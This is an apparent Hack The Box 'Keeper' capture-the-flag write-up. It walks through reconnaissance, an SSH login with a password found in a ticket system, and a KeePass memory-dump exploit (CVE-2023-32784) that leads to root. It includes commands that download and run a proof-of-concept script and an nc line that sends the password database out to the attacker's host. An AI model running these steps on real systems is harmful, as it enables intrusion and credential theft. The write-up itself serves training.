HTB Keeper: Formal Writeup
Synopsis:
Keeper is a Linux easy machine that hosts the Request Ticket (RT 4.4.4) web application. A password for the user lnorgaard was found in the web application, which was then used to log into the host via SSH. Upon logging in as lnorgaard, a zip file for the KeePass application was found. Unzipping the file revealed a dump file and a database file. The KeePass dump files are vulnerable to CVE-2023–32784, which allows an attacker to dump the master password. After cracking the database file, a PuTTY key was found. This key was then converted into an SSH key, which allowed the attacker to compromise the entire host.
Active Recon:
The attacker decided to begin with a basic nmap scan. From the initial nmap scan 2 open ports were found, one was typical SSH and the other one was HTTP. On the HTTP server nginx 1.18.0 was running.
┌──(toothless5143@kali)-[~]
└─$ sudo nmap -Pn -sV -sC --min-rate=5000 -T4 10.10.11.227
[sudo] password for toothless5143:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-05 23:07 CDT
Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.29% done; ETC: 23:07 (0:00:00 remaining)
Nmap scan report for 10.10.11.227
Host is up (0.055s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3539d439404b1f6186dd7c37bb4b989e (ECDSA)
|_ 256 1ae972be8bb105d5effedd80d8efc066 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.77 secondsUpon visiting the web server a VHOST named tickets.keeper.htb was discovered.
So the attacker added the VHOST into /etc/hosts.
┌──(toothless5143@kali)-[~]
└─$ echo "10.10.11.227 tickets.keeper.htb" | sudo tee -a /etc/hostsAfter visiting the found VHOST the attacker found that, its a request ticket web application. It also revealed its version.
Vulnerability Analysis & Exploitation:
While manually exploring the web app it was found out that the user lnorgaard had some problems with their KeePass and they submitted a dump of their KeePass via a ticket. Upon visiting the user’s profile a comment containing the user’s password was found.
Upon trying the attacker successfully logged in via SSH by using the found password.
┌──(toothless5143@kali)-[~]
└─$ ssh lnorgaard@10.10.11.227
lnorgaard@10.10.11.227's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)
Last login: Wed Sep 6 06:42:16 2023 from 10.10.14.37
lnorgaard@keeper:~$ After gaining the initial foothold the user flag was found from the file/home/lnorgaard/user.txt.
Post Exploitation:
Inside the user’s home directory a zip file named RT30000.zip was found. After unzipping the file a KeePass database file and a dump file was found. Upon researching it was found out that KeePass is vulnerable to CVE-2023–32784, which allows an attacker to dump the master password from the file .dmp. For further researching the attacker uploaded the PoC file on the target host via python HTTP server.
Starting the python web server:
┌──(toothless5143@kali)-[~]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...Downloading the file and executing on the target host:
# Downloading the file
lnorgaard@keeper:~$ wget http://10.10.14.34/poc.py
# Gving execution permission
lnorgaard@keeper:~$ chmod +x poc.py
# Executing the script
lnorgaard@keeper:~$ python3 poc.py KeePassDumpFull.dmp
2023-09-06 08:51:35,828 [.] [main] Opened KeePassDumpFull.dmp
Possible password: ●,dgr●d med fl●de
Possible password: ●ldgr●d med fl●de
Possible password: ●`dgr●d med fl●de
Possible password: ●-dgr●d med fl●de
Possible password: ●'dgr●d med fl●de
Possible password: ●]dgr●d med fl●de
Possible password: ●Adgr●d med fl●de
Possible password: ●Idgr●d med fl●de
Possible password: ●:dgr●d med fl●de
Possible password: ●=dgr●d med fl●de
Possible password: ●_dgr●d med fl●de
Possible password: ●cdgr●d med fl●de
Possible password: ●Mdgr●d med fl●dePrivilege Escalation:
As the script mentioned it only gives possible char combination’s. After searching for the found term on google it was found out that its a dessert from denmark “rødgrød med fløde”. Then the attacker decided to crack the database file using https://app.keeweb.info/.
Exfiltarating the database file:
# On the attacker's host
┌──(toothless5143@kali)-[~]
└─$ nc -l -p 8000 > passcodes.kdbx
# On the target host
lnorgaard@keeper:~$ nc -w 3 10.10.14.34 8000 < passcodes.kdbxUpon finally cracking the database file the attacker found a putty ssh key for the root user. The process of converting the putty file into a private ssh key is shown below.
1. First save the notes of the database file into a .txt file.
2. Apply the command, puttygen putty.txt -0 private-openssh -0 id_rsa to convert the putty key into a ssh key.
3. Change the ssh key permission, chmod 600 id_rsa.
4. Log in as a root user using ssh.
┌──(toothless5143@kali)-[~]
└─$ ssh root@10.10.11.227 -i id_rsa
root@keeper:~# id
uid=0(root) gid=0(root) groups=0(root)The root flag was obtained from /root/root.txt and the host was fully pwned by the attacker.
Signing out,
- Toothless
